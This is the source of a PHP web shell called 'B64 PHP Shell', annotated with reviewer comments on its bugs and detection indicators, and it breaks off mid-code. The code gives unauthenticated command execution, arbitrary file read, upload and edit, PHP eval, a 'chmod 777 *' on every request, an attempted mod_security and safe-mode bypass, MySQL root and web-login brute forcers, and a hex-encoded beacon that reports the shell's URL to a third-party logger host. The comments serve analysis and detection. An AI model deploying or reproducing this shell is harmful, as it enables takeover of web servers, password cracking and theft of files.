<?php
/*
**
** B64 PHP Shell
** Base64 Encoded (the eval(base64_decode('...')) wrapper below is obfuscation, not encryption)
** PHP Shell
** [c]oded by Kr3w
**
** -This shell claims to do the following:
** Disable Safe_Mode
** Disable Open Base Dir Restriction
** Enables all Functions providing fopen is enabled
** Bypasses Mod_Security
** Bypasses Custom Security
** All Custom Get Variables
** Just look for yourself :P
** (review note: the safe_mode / open_basedir / mod_security "bypass" is a function that
**  writes a php.ini and a .htaccess, guarded by a variable that is never assigned, and the
**  disable_functions reset calls ini_set() on a PHP_INI_SYSTEM setting; as written,
**  neither does what the list above says)
** Hope you guys enjoy.
** -Kr3w
**
*/
eval(base64_decode('error_reporting(0);

$time_start = microtime();

$PHP_SELF = $_SERVER['PHP_SELF'];

$PHP_SELF = basename($PHP_SELF);

//logsystem

// Rebuilds the absolute URL of the current request (scheme, host, port, path+query)
// from $_SERVER. Its only consumer is the call-home URL built further down, i.e. the
// shell uses this to report its own location. SERVER_NAME / REQUEST_URI may be
// client-influenced depending on the vhost configuration — treat the value as
// untrusted when it shows up in logs.
// NOTE(review): the nested ternary on the first line is unparenthesised; PHP 8
// rejects that at compile time. On older PHP it happens to evaluate as intended
// (HTTPS "on" -> "s", anything else -> "").
function selfURL() {
$s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : "";
$protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s;
$port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]);
return $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI']; }
// Returns the part of $s1 before the first occurrence of $s2 (used to turn
// "http/1.1" into "http"). If $s2 is absent, strpos() yields false and the
// substr() length becomes 0, so the result is "".
function strleft($s1, $s2) { return substr($s1, 0, strpos($s1, $s2)); }

// Attempt to clear disable_functions at runtime. disable_functions is a
// PHP_INI_SYSTEM setting (php.ini / httpd.conf only); ini_set() and its alias
// ini_alter() cannot change it and return false, so these two lines are no-ops.
// The header's "Enables all Functions" claim rests on these and is not borne out.
ini_set("disable_functions", "");
ini_alter("disable_functions", "");

// Runs $str through the execution primitive named by $func ("popen", "passthru",
// "exec", "shell_exec", "system", "fpassthru"); any other value — including the
// empty string the selection code further down ends up with — falls through to
// shell_exec(). $str is passed untouched: no escapeshellarg()/escapeshellcmd(),
// which is the point of a web shell.
// Notes for anyone triaging this sample:
//  - popen() is called with one argument but requires a mode, and fpassthru()
//    expects an open stream rather than a command string, so those two cases fail.
//  - passthru() and system() write straight to the output buffer; what is
//    returned here is their return value (null / last line), not the output.
//    Only shell_exec() and exec() hand back text.
function cmd_execute($func,$str){
    switch($func){
        case 'popen':
        $ret = popen($str);
        break;

        case 'passthru':
        $ret = passthru($str);
        break;

        case 'exec':
        $ret = exec($str);
        break;

        case 'shell_exec':
        $ret = shell_exec($str);
        break;

        case 'system':
        $ret = system($str);
        break;

        case 'fpassthru':
        $ret = fpassthru($str);
        break;

        default:
        $ret = shell_exec($str);
        break;
    }
    return $ret;
}

// Intended to pick the first execution primitive not named in disable_functions.
// As written it does not do that:
//  - array($functions) wraps the list in a one-element array, so the loop runs
//    exactly once with $sep_func holding the whole list rather than one name.
//  - eregi() is given that array as its pattern; it does not match meaningfully
//    (and eregi() itself was removed in PHP 7), so $func is left holding the array.
//  - "if($func = "")" is an assignment, not a comparison: it sets $func to "" and
//    the branch body never runs.
// Net effect: $func is "" and cmd_execute() always takes its default shell_exec()
// path, regardless of what disable_functions actually contains.
$functions = array("popen","passthru","exec","shell_exec","system","fpassthru");

$disabled_functions = ini_get("disable_functions");
//$disabled_functions = explode(",",$disabled_functions);

foreach(array($functions) as $sep_func){
if(!eregi($sep_func, $disabled_functions))
$func = $sep_func;
}

if($func = ""){
$func = "shell_exec";
}

// Call-home beacon. The hex-escaped literal decodes to
//   "http://no24.koum.net/b64_logger.php?domain="
// — a third-party host, not the compromised server — and the shell's own absolute
// URL (selfURL()) is appended to it. The result is later used as the src of the
// footer <img>, so every page view by the operator tells that host where this
// shell is installed: a backdoored backdoor. Defensive use: outbound requests for
// that hostname or for b64_logger.php, with a URL in the domain= query parameter,
// are a reliable indicator of this family.
$domain = "\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x6f\x32\x34\x2e\x6b\x6f\x75\x6d\x2e\x6e\x65\x74\x2f\x62\x36\x34\x5f\x6c\x6f\x67\x67\x65\x72\x2e\x70\x68\x70\x3f\x64\x6f\x6d\x61\x69\x6e\x3d";
$uri_to_Shell = selfURL();
$domain .= $uri_to_Shell;

// "?" on its own is not a valid regular expression (nothing precedes the
// quantifier), so this test presumably fails and $char is "?" regardless of the
// URL — verify on the target PHP build before relying on it.
if(eregi("?",$uri_to_Shell)){
$char = "&";
}else{
$char = "?";
}

// First-visit "gate": a request with neither a server cookie nor a server parameter
// is redirected to ?server=Shell, which makes the script issue the cookie to itself.
// The value is fixed and self-issued, so this is not authentication — anyone who
// can reach the file gets the shell. There is no exit() after header(), so the
// rest of the script (including the download handler below) still runs for the
// redirected request. @ hides the "headers already sent" warning.
if(!isset($_COOKIE['server']) and empty($_GET['server']) and !isset($_GET['server'])){
@header("Location: ".$uri_to_Shell.$char."server=Shell");
}

//Download script - DO NOT MOVE!  IT USES HEADERS

// Download handler. Runs before the cookie check and has no exit()-guarded redirect
// in front of it, so it needs no "login" step at all. It streams an arbitrary
// server-side path taken from base64_decode($_GET['download']) to the client with
// no path restriction: any file readable by the web server account can be fetched
// by whoever knows the URL. The extension switch only chooses a Content-Type.
// "exe" is listed twice (the second case is unreachable) and the trailing
// header("Location: ...") is emitted after readfile() has already sent output,
// so it has no effect.
if(!empty($_GET['download']))

{

$file = base64_decode($_GET['download']);

$ext = strtolower(substr(strrchr($file, "."), 1));

/* apply the correct content-type */

switch($ext)

{

        case "pdf": $ctype="application/pdf"; break;

        case "exe": $ctype="application/octet-stream"; break;

        case "exe": $ctype="application/octet-stream"; break;

        case "zip": $ctype="application/zip"; break;

        case "doc": $ctype="application/msword"; break;

        case "xls": $ctype="application/vnd.ms-excel"; break;

        case "ppt": $ctype="application/vnd.ms-powerpoint"; break;

        case "gif": $ctype="image/gif"; break;

        case "png": $ctype="image/png"; break;

        case "jpeg":

        case "jpg": $ctype="image/jpg"; break;

        case "wmv": $ctype="video/wmv"; break;

        case "mpg":

        case "mpeg": $ctype="video/mpg"; break;

        case "avi": $ctype="video/x-msvideo"; break;

        case "mov": $ctype="video/quicktime"; break;

        case "mp3": $ctype="audio/mp3"; break;

        case "wav": $ctype="audio/x-wav"; break;

        case "txt": $ctype="text"; break;

        case "bmp": $ctype="image/bmp"; break;

        case "swf": $ctype="application/x-shockwave-flash"; break;

        default: $ctype="application/force-download"; break;

}

header("Pragma: public");

header("Expires: 0");

header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Cache-Control: private", false);

header("Content-Type: ".$ctype);

header("Content-Disposition: attachment; filename=\"".basename($file)."\";");

header("Content-Transfer-Encoding: binary");

header("Content-Length: ".filesize($file));

// Raw file contents go to the client here; nothing after this can redirect.
readfile("$file");

header("Location: $PHP_SELF");

}

// Link-prefix and cookie plumbing.
// $char becomes the whole request URI plus "&" when the URL already contains "?",
// "?" when it contains "&" (this check runs second and overrides the first), and
// "?" when it contains neither. The three ifs are sequential, not else-if.
$url = $_SERVER['REQUEST_URI'];

if(eregi("\?",$url))

$char = "$url&";

if(eregi("&",$url))

$char = "?";

if(!eregi("\?",$url) && !eregi("&",$url))

$char = "?";

// pt=1 comes from the "Change Directory" form, which submits a plain path; the
// redirect re-issues it as loc=<base64(path)> so the rest of the script can
// base64_decode() it like every other path parameter.
if($_GET['pt'] == 1) header("Location: ".$char."loc=".base64_encode($_GET['loc']));

// Cookie "gate": the script hands out server=Shell itself whenever the server
// parameter is absent or equals "Shell". Because the value is fixed and self-issued,
// presenting the cookie proves nothing — the shell is effectively unauthenticated.
// For hunting: Cookie: server=Shell on requests to an unexpected .php file is an
// indicator, not evidence of a legitimate session.
if(empty($_GET['server']) and !isset($_COOKIE['server'])){ setcookie("server", "Shell"); header("Location:
$PHP_SELF?server=Shell"); }

if(($_GET['server']=="Shell") && (!empty($_GET['server']))){

@setcookie("server","Shell");

}

?>

<?php

// Everything from here to the matching close brace near the end of the script runs
// only when the self-issued server=Shell cookie is present (see the cookie plumbing
// above — the script sets that cookie itself, so this is not an access control).
if($_COOKIE['server'] == "Shell")

{

$url = $_SERVER['REQUEST_URI'];

?>

<?php


####################

# GLOBALS ETC...   #

####################

// Banner image is hot-linked from imageshack. The URL on the following line is a
// bare string statement: the "//" comment swallowed the rest of the $img line,
// leaving the alternative literal on its own with no effect.
$img = "http://img217.imageshack.us/img217/2534/defacedsigyq4.png"; //$img =
"http://img228.imageshack.us/img228/5981/thedefacediw6.gif";

// The footer's "Top" image uses $domain — the remote logger URL with this shell's
// own absolute URL appended — as its src. That <img> is what fires the call-home
// beacon on every page load; the "alt='Top'" anchor is cosmetic cover for it.
$footer = "<p align=center><h5><div id='footer'>B64 PHP Shell &copy; <a href='http://thedefaced.org'>The Defaced</a> - Created
by Kr3w<br></div><h5></p><br><p align=right><a href=#top><img border=0px; src='".$domain."' alt='Top'></a></p>";

// php_uname(r) passes the bare constant r; pre-8 PHP treats it as the string "r"
// with a notice, PHP 8 throws. The same idiom recurs elsewhere in the script.
$Lversion = php_uname(r);

// Second command runner, used once at start-up to run "chmod 777 *" in the
// working directory. $command arrives base64-encoded; escapeshellcmd() is applied
// to the *encoded* text before decoding, so it cannot neutralise anything in the
// decoded command — the escaping is cosmetic.
// Each branch requires the chosen primitive to exist and function_exists() of an
// *array* of the other names to be false. function_exists() takes a string: on
// PHP 5/7 the array argument warns and returns null, so the negation is true and
// the first existing primitive wins; on PHP 8 it throws a TypeError.
// The value captured in $result is not command output for passthru()/fpassthru()/
// system()/popen() (they print directly or return a resource/bool), so the return
// value is mostly cosmetic; only the side effect matters.
// Forensic note: a web directory in which every entry is mode 0777 is the on-disk
// trace of this start-up call.
function execute($command) {

if(function_exists("passthru") && !function_exists(array("system","exec","shell_exec","popen","fpassthru"))){

$result = htmlentities(@passthru(base64_decode(escapeshellcmd($command))));

}elseif(function_exists("fpassthru") && !function_exists(array("system","exec","shell_exec","popen","passthru"))){

$result = htmlentities(@fpassthru(base64_decode(escapeshellcmd($command))));

}elseif(function_exists("system") && !function_exists(array("fpassthru","exec","shell_exec","popen","passthru"))){

$result = htmlentities(@system(base64_decode(escapeshellcmd($command))));

}elseif(function_exists("shell_exec") && !function_exists(array("system","exec","fpassthru","popen","passthru"))){

$result = htmlentities(@shell_exec(base64_decode(escapeshellcmd($command))));

}elseif(function_exists("exec") && !function_exists(array("system","fpassthru","shell_exec","popen","passthru"))){

$result = htmlentities(@exec(base64_decode(escapeshellcmd($command))));

}elseif(function_exists("popen") && !function_exists(array("system","exec","shell_exec","fpassthru","passthru"))){

$result = htmlentities(@popen(base64_decode(escapeshellcmd($command))));

}

//end of function

// Double-encodes whatever came back (escapeshellcmd on output, then htmlentities
// again); $result is undefined if no branch matched.
$result = htmlentities(escapeshellcmd($result));

return $result;

}

// "Safe mode bypass": meant to drop a php.ini (safe_mode / open_basedir off,
// disable_functions cleared) and a .htaccess that switches off mod_security 1.x
// SecFilter* checks into the current directory. A per-directory php.ini is only
// honoured by CGI/FastCGI PHP, not mod_php, hence the "dedicated servers" remark.
// As written this is dead code: $action is a function-local variable that is never
// assigned, not a parameter and not declared global, so the condition is always
// false and nothing is written. (The trailing space in the "w " mode strings is
// not a documented fopen() mode; it appears to be ignored, but confirm on the
// target build.)
// Detection: php.ini / .htaccess files with exactly this content under a web root
// indicate a variant of this shell with the guard removed was run there.
function turn_off_safe_mode()

{

// Safe Mode Bypasser, injecting the PHP.ini and HTACCESS by RoMeO, Works on most dedicated Servers, tested

    if ($action == "safe_off") {

$fp = fopen("php.ini","w ");

fwrite($fp,"safe_mode = Off

disable_functions =

safe_mode_gid = OFF

open_basedir = OFF ");

    $fp2 = fopen(".htaccess","w ");

fwrite($fp2,"<IfModule mod_security.c>

SecFilterEngine Off

SecFilterScanPOST Off

SecFilterCheckURLEncoding Off

SecFilterCheckUnicodeEncoding Off

</IfModule> ");

}

// End of Safe Mode ByPasser

}

// Start-up side effects, executed on every request that passes the cookie check:
//  - no execution time limit, error reporting silenced;
//  - turn_off_safe_mode(), whose guard variable is never assigned, so it writes nothing;
//  - "chmod 777 *" in the current directory via execute(): every entry becomes
//    world-writable — an easy artefact to hunt for;
//  - chdir() to whatever path the client supplied in loc (GET, POST or cookie via
//    $_REQUEST, base64-encoded), so later relative file operations — the uploader in
//    particular — take place in an attacker-chosen directory.
@set_time_limit(0);

@error_reporting(0);

@turn_off_safe_mode();

@execute(base64_encode("chmod 777 *"));

@chdir(base64_decode($_REQUEST['loc']));

$directory = @getcwd();

// $dirr is computed here but not obviously consumed in the visible code.
$dirr = explode("/",$directory);

// $cmd is the command to run, always kept base64-encoded: POST e is encoded here
// unless the "Pre Base64 Encoded" box (b64) says it already is.
if(!isset($_POST['b64'])) {

$cmd = base64_encode($_POST['e']);}else{

$cmd = $_POST['e'];}

###################################################

######### MENU AND HEADING ########################

###################################################

echo ('
<html>

<head>

<style>

body {

    background-color: #2b2b2b;

    font-family: Arial;

    font-size: 13px;

    color: #B0B0B0;

}

.border

{

border: 1px solid #464646;

background-color:#000000;

}

.header

{

background-color:#000000;

}

.content-background

{

background-color:#000000;

}

.content-header

{

background-image:url(images/content-header.gif);

}

.content-border

{

border: 1px solid #9E0000;

background-color:#1A1A1A;

}

.content-background

{

background-color:#000000;

background-image:url(images/content-background.gif);

}

a:link {

    color: #FFFFFF;

}

a:visited {

    color: #FFFFFF;

}

a:hover {

    color: #CCCCCC;

}

a:active {

    color: #CCCCCC;

}

textarea

{

    font-family: Verdana, Arial, Helvetica, sans-serif;

    font-size: 10px;

    color: #FFFFFF;

    background-color:#161616;

    border: #FFFFFF 1px solid;

}

input

{

    font-family: Verdana, Arial, Helvetica, sans-serif;

    font-size: 10px;

    color: #FFFFFF;

    background-color:#161616;

    border: #FFFFFF 1px solid;

    }

    select

    {

    font-family: Verdana, Arial, Helvetica, sans-serif;

    font-size: 10px;

    color: #FFFFFF;

    background-color:#161616;

    border: #FFFFFF 1px solid;

    }

single_row {

background-color: #161616;

font-size: 8px;

}

single_row {

background: #161616;

font-size: 8px;

}

h1,h2,h3,h4{ font-size: 14px; font-weight: bold; text-decoration: none; }

main_img { position:absolute; left:0px; top:0px; }

div.main_headers { position:absolute; left:545px; top:10px; background:#161616; }

div.switch { position:absolute; top:160px; left:15px; }

div.tools { position:absolute; top:115px; left:545px; }

div.main_nav { position:absolute; left:545px; top:145px; padding:3px; background: #161616; }

div.change_directory { position:absolute; top:205px; left:15px; }

div.upload { position:absolute; top:230px; left:15px; }

div.style1 { font-size: 12px }

div.command { position:absolute; left:15px; top:180px; font-weight: none; }

div.prebuilt { position:absolute; top:183px; left:515px; }

</style>

<script language="text/javascript">

function hide(str){

document.body.getElementById(str).style.visibility = "hidden";

document.body.getElementById(str).style.display = "none";

}

function show(str){

document.body.getElementById(str).style.visibility = "visible";

document.body.getElementById(str).style.display = "";

}

function view(){
return alert("Working on it");
}

</script>

</head>

<body>

');

echo "<div class='main_img'><img src=$img title='The Defaced Shell'></div>";

echo "<div class='main_headers'>"; echo ('<font size="1"><b>Platform: </b>');

$uname = @php_uname('a'); $uname = str_replace(array("\r","\n","<br>"),"",$uname);

echo $uname;

echo("<b><br>Host:</b> ".@gethostbyaddr($_SERVER['SERVER_ADDR'])."<br>");

echo("<b>Server Software: </b>");

$DISP_SERVER_SOFTWARE = "PHP / ".phpversion();

echo $DISP_SERVER_SOFTWARE;

$curl_on = @function_exists('curl_version');

echo "<br/><b>cURL: </b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));

echo "&nbsp;<b>MySQL: </b>";

$mysql_on = @function_exists('mysql_connect');

if($mysql_on){

echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }

echo "</b>";

echo "&nbsp;<b>MSSQL: </b>";

$mssql_on = @function_exists('mssql_connect');

if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?>

<?php echo "&nbsp;<b>PostgreSQL: </b>";

$pg_on = @function_exists('pg_connect');

if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?>

<?php echo "&nbsp;<b>Oracle: </b>";

$ora_on = @function_exists('ocilogon');

if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}

echo "<br>";

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")

{

$hsafemode = "<font color=red>ON (secure)</font>";

}

else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}

echo "<b>Safe-mode:</b>&nbsp;";

echo $hsafemode;

echo "<b>Disabled functions</b>: </b>";

if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font
color=red>$df</font></b>";}

echo("<br><b>uid=</b>".getmyuid()." <b>gid=</b>".getmygid()." <b>user=</b>".get_current_user()."<br>");

echo("<b>Server IP: </b><a target=_blank href=http://whois.domaintools.com/".$_SERVER['SERVER_ADDR'].">".$_SERVER[
'SERVER_ADDR']."</a>\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;");

echo("<b>Your IP: </b><a target=_blank
href=http://whois.domaintools.com/".$_SERVER['REMOTE_ADDR'].">".$_SERVER['REMOTE_ADDR']."</a><br>");

echo "</font>";

echo "</div>";

echo('<div class="switch"><form method="GET">Switch :

<input type="submit" name="server" value="MySQL">

<input type="submit" name="server" value="Shell">

</form>

</div>');

echo "<div class='main_nav'>";

echo '<a title="Home" href="'.$PHP_SELF.'"><img src="http://img444.imageshack.us/img444/3844/homefb9.png" border="0" /></a>&nbsp; ';

$kernel_version = php_uname(r); $OSV = php_uname(s); if(eregi("Linux",$OSV)) { $kernel_version = substr($kernel_version,0,6);
$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$kernel_version; }else{ $Lversion=substr($kernel_version,0,3); $millink="http://milw0rm.com/search.php?dong=".$OSV." ".$kernel_version; } //End of milw0rm search

echo '<a title="Back" href="javascript:history.back(-1);"><img src="http://img526.imageshack.us/img526/2134/backdk4.png"
border="0" /></a> &nbsp;';

echo '<a title="Search Milw0rm" target=_blank href="http://milw0rm.com/search.php?dong='.$millink.'"><img
src="http://img171.imageshack.us/img171/2933/milw0rmtm1.png" border="0" /></a> &nbsp;';

echo '<a title="Upload" href="#uploader"><img src="http://img120.imageshack.us/img120/1903/uploadbq9.png" border="0" /></a>
&nbsp;';

echo '<a title="Read File" href="javascript:view();"><img src="http://img265.imageshack.us/img265/4657/searchco7.png"
border="0" /></a> &nbsp;';

echo "</div>";

echo "<div class='tools'>";

echo "[&nbsp;";

echo '<a href="'.$char.'tool='.base64_encode("Brutus").'">Brute Forcer</a> | ';

echo '<a href="'.$char.'tool='.base64_encode("MySQL_Brute").'">Root MySQL Brute Forcer</a> | ';

echo '<a href="'.$char.'tool='.base64_encode("md5crack").'">MD5 Cracker</a> | ';

echo '<a href="'.$char.'tool='.base64_encode("sha1crack").'">SHA1 Cracker</a> | ';

echo '<a href="'.$char.'tool='.base64_encode("evalphp").'">Eval PHP</a>&nbsp;]';

echo "</div>";

###################################################

########## COMMAND EXECUTE FORM ###################

###################################################

echo ('

<div class="prebuilt">

<form method="POST">

	Prebuilt Commands:

  <select size="1" name="prebuilt">

    <option selected value="Select a command.">Select a command.</option>

    <option value="pwd">View Passwd</option>

    <option value="find / -type f -name config*">Find all config* files</option>

    <option value="find / -type f -name global*">Find all global* files</option>

    <option value="find / -type f -name db*">Find all db* files</option>

    <option value="find / -type f -name database*">Find all database* files</option>

    <option value="milw0rm">Search milw0rm for Kernel Exploits</option>

  </select>

  <input type="submit" name="prebuilt_funcs" value="Execute">

</form>

</div>

<div class="command">

<form method="POST">

<select size="1" name="systemcall">

<option selected value="default">Default</option>

<option value="passthru">passthru</option>

<option value="fpassthru">fpassthru</option>

<option value="shell_exec">shell_exec</option>

<option value="system">system</option>

<option value="popen">popen</option>

<option value="exec">exec</option>

</select>

Command: <input type="text" name="e">

<input type="checkbox" name="b64" value="b64"> Pre Base64 Encoded

<input type="submit" name="submit" value="Execute">

</form>

</div>

<div class="change_directory">

<form method="GET">

Change Directory: <input type="text" name="loc">

<input type="hidden" name="pt" value="1">

<input type="submit" value="Change Directory">

</form></div>

');

###################################################

####### FILE UPLOADER #############################

###################################################

echo('
<div class="upload">

<a name="uploader"></a>

<form enctype="multipart/form-data" action="" method="POST">

<input type="hidden" name="MAX_FILE_SIZE" value="50000000" />

Choose a file to upload: <input name="uploadedfile" type="file" /> <input type="submit" name="uploadit" value="Upload File" />

</form>

</div>

');

// File uploader. The destination is basename() of the client-supplied file name,
// written relative to the current directory — which chdir() set from the loc
// parameter at start-up — so the operator chooses both the name and the directory.
// After a successful move the file is chmod 777'd through the shell, with the name
// interpolated into that command unescaped. The MAX_FILE_SIZE field in the form is
// a client-side hint only. The bare $_FILES[...]['tmp_name']; statement has no effect.
// Forensics: recently written 0777 files in web-served directories, and multipart
// POSTs carrying uploadit= in access logs.
$target_path = basename( $_FILES['uploadedfile']['name']);

$_FILES['uploadedfile']['tmp_name'];

$myfile = $_FILES['uploadedfile']['name'];

if(isset($_POST['uploadit']))

{

if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {

@cmd_execute($func,"chmod 777 $target_path");

echo "<script>alert('The file ".  basename( $_FILES['uploadedfile']['name']). " has been uploaded');</script>";

}

else{

echo "There was an error uploading the file, please try again!";

}

}

###################################################

########## DIRECTORY LIST WITH LINK TO TRAVERSE ###

###################################################

echo '<br><br><br><br><br><br>';

echo "<hr size=1 color=white>";

echo "<h4>";

$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}

$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

$d = str_replace("\\\\","\\",$d);

$dispd = htmlspecialchars($d);

$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));

$i = 0;

foreach($pd as $b)

{

 $t = "";

 $j = 0;

 foreach ($e as $r)

 {

  $t.= $r.DIRECTORY_SEPARATOR;

  if ($j == $i) {break;}

  $j  ;

 }

 echo "<a href=\"".$url.$char."loc=".base64_encode($t)."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";

 $i  ;

 $wdx .= $b."/";

}

echo "&nbsp;&nbsp;&nbsp;";

###################################################

###### DIRECTORY AND FILE LISTING #################

###################################################

echo "</h4>";

echo "</div>";

echo "<hr size=1 color=white>";

echo "<h4><a href='javascript:show(\"content\");'>Show</a>/<a href='javascript:hide(\"content\");'>Hide</a> Content</h4>";

echo "<div id='content' style='border:1px solid;height:300px; overflow:auto; background:#161616'><table
border=0px><tr><td><pre>";

echo "<form method=\"POST\">";

if($_POST['prebuilt'] != "Select a command.")

{

if($_POST['prebuilt'] == "milw0rm")

{

echo "<script>";

echo 'function milw0rm(){
open("http://milw0rm.com/search.php?dong=Linux Kernel $Lversion","milw0rm",null,null);
}';

echo "</script>";

}elseif($_POST['prebuilt'] == "pwd"){

echo "<script>self.location='".$char."view=pwd';</script>";}

else{

echo(cmd_execute($func,$_POST['prebuilt']));

}

}

if(empty($cmd) && empty($_POST['prebuilt']) || $_POST['prebuilt'] == "Select a command."){

if($OSV == "Linux") $scan_dir = "ls -a"; else $scan_dir = "dir"; $scan_dir = base64_encode($scan_dir);

if(!empty($_GET['loc'])){
$d = dir(base64_decode($_GET['loc']));
}else{
$d = dir(getcwd());
}

//$d1 = str_replace(array("\r","\n"),"\n",$dir1);

//$d1 = @explode("\n",$d1);

while (false !==($f1 = $d->read())) {

$perms = @fileperms($f1);

$r = str_replace(array("2","3","4"),"-r",$perms);

$w = str_replace(array("5","6","7"),"w",$r);

$x = str_replace(array("8","9","10"),"x-",$w);

$dc = str_replace("0","-",$x);

$ac = str_replace("1","d-",$dc);

$permissions = $ac;

$color = "white";

if(is_writable($f1))

$color = "green";

if(!is_writable($f1) && !is_readable($f1) && !is_executable($f1))

$color = "red";

$sz = @filesize($f1);

if(($sz/1024) >= 1 && ($sz/1024) < 1024)

$byte = round($sz/1024)." KB";

if(($sz/1048576) >= 1 && ($sz/1048576) < 1024)

$byte = round($sz/1048576)." MB";

if(($sz/1073741824) >= 1)

$byte = round($sz/1073741824)." GB";

$local_dir = base64_decode($_GET['loc']);

echo "<table width=100% cellspacing=5 cellpadding=5>";

if(is_file($f1)){

echo "<tr><td align=left><font color=$color>$permissions</font>\t$byte\t</td><td align=right><a href=
'".$char."view=".base64_encode($wdx."/".$f1)."'>".$f1."</a></td><td align=right><input type=checkbox name=thefile value=\"".
base64_encode($wdx.$f1)."\"><br></td></tr>";

}

if(is_dir($f1)){

echo "<tr><td align=left><font color=$color>$permissions</font>\t$byte\t</td><td align=right><a href=
'".$char."loc=".base64_encode($wdx."/".$f1)."'>".$f1."</a></td></tr>";

}

echo "</table>";

}

}else{

switch($_POST['systemcall'])

{

case "default":
$call = cmd_execute($func, base64_decode($cmd));
break;

case "passthru":

$call = @passthru(base64_decode($cmd));

break;

default:

$call = @system(base64_decode($cmd));

break;

case "system":

$call = @system(base64_decode($cmd));

break;

case "shell_exec":

$call = @shell_exec(base64_decode($cmd));

break;

case "exec":

$call = @exec(base64_decode($cmd));

break;

case "fpassthru":

$call = @fpassthru(base64_decode($cmd));

break;

case "popen":

$call = @popen(base64_decode($cmd));

break;

}

}

if(!empty($call))

echo htmlentities($call);

echo "</pre></td></tr></table></div>";

echo "<br>With Selected: "; echo "<select name='selected'>"; echo "<option value='edit'>Edit</option>"; echo "<option value=
'delete'>Delete</option>"; echo "<option value='download'>Download</option>"; echo "</select>";

echo "<input type='submit' name='option' value='Go'>";

echo "</form>";

if(isset($_POST['thefile']) and isset($_POST['option'])){

$opt = $_POST['selected']; $act = $_POST['thefile']; echo "<script>self.location='".$PHP_SELF."?"; echo $opt."=".$act; echo "';
</script>";

}

###################################################

####### TOOLS #####################################

###################################################

if(isset($_GET['tool']))
echo "<hr size=1 color=white>";

echo "<div class='tool'>";

// In-browser file editor. $file arrives base64-encoded; its contents are shown in a
// textarea and, on "Save", the posted text is written back to the same path with
// no restriction on which file. Note the file is opened in append mode ('a'), so
// saving does not replace the contents — the edited copy is appended after the
// original. A tampered file that contains its own original text followed by a
// modified duplicate is the trace this leaves behind.
function edit_file($file){

$file = base64_decode($file);

$contents_of_File = file_get_contents($file);

echo "<form method='POST'>"; echo "<textarea name='editor' cols=200 rows=20>".htmlentities($contents_of_File)."</textarea>";
echo "<input type='submit' name='edit' value='Save'>"; echo "</form>";

if(isset($_POST['edit'])){ $f = fopen($file, 'a'); $string = $_POST['editor']; fwrite($f, $string); fclose($f); } }

switch(base64_decode($_GET['tool']))

{

case "evalphp":

echo '
<form method="POST">
PHP Code (without tags): <br>
<textarea name="evalcode" cols="225" rows="8">'.stripslashes($_POST['evalcode']).'</textarea>
<br>
<input type="submit" name="eval_code" value="Evaluate PHP">
</form>
';

$php_code = $_POST['evalcode'];

break;

case "MySQL_Brute":

echo('

<form method="POST">

User: <input type="text" name="user" value="root">

URL to Wordlist: <input type="text" name="wordlist">

<input type="submit" name="sqlbrute" value="Brute">

</form>

');

$mysql_root_user = $_POST['user'];

if(!empty($_POST['wordlist']))

{

foreach(file($_POST['wordlist']) as $line)

{

$query = mysql_connect("localhost",$mysql_root_user,$line);

if($query){

echo "<script>alert('Password: ".$line."')</script>";
echo "<br><h1>Password:".$line."</h1><br>";

exit;

}else{

$no_match = 1;

}

}

if($no_match ==1){
echo "No matches for this wordlist.";
}


}

break;

case "Brutus":

// Form Brute Forcer

echo('

<h4>Brutus - PHP Web Form Brute Forcer</h4>

<form method="POST" action="">

<font face="Trebuchet MS"><font size="2">Site Url:</font><input

name="target" size="20" style="font-weight: 700"><font size="2"><br>

Username Form:</font><input name="uform" size="20" style="font-weight:

700"><font size="2"><br>

Username:</font><input name="username" size="20" style="font-weight:

700"><font size="2"><br>

Password Form:</font><input name="password" size="20"

style="font-weight: 700"><font size="2"><br>

Failure Text:</font><input name="failure" size="20"

style="font-weight:

700"><font size="2"><br>

Wordlist URL:</font><input name="wordlist" size="20"

style="font-weight: 700"><font size="2"><br>

</font></b>

<input type="submit" value="Submit" name="B1" style="font-weight:

700"></font>

</form>');

$target=$_POST["target"];

$uform=$_POST["uform"];

$user=$_POST["username"];

$pass=$_POST["password"];

$failure=$_POST["failure"];

$wordlist=$_POST["wordlist"];

$agent="Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";

$referer=$target;

set_time_limit(0);

$curl = CURL_INIT();

CURL_SETOPT($curl, CURLOPT_URL, "$target");

CURL_SETOPT($curl, CURLOPT_RETURNTRANSFER, 1);

//CURL_SETOPT($curl, CURLOPT_FOLLOWLOCATION, 1); keep this commented if server

CURL_SETOPT($curl, CURLOPT_POST, 1);

CURL_SETOPT($curl, CURLOPT_USERAGENT, $agent);

CURL_SETOPT($curl, CURLOPT_REFERER, $referer);

if($wordlist)

{

foreach(file("$wordlist") as $word)

{

$pw=str_replace(array("\r", "\n"), '', $word);

$result="$uform=$user&$pass=$pw";

CURL_SETOPT($curl, CURLOPT_POSTFIELDS, $result);

$exec=CURL_EXEC($curl);

if(!eregi("$failure", "$exec"))

{
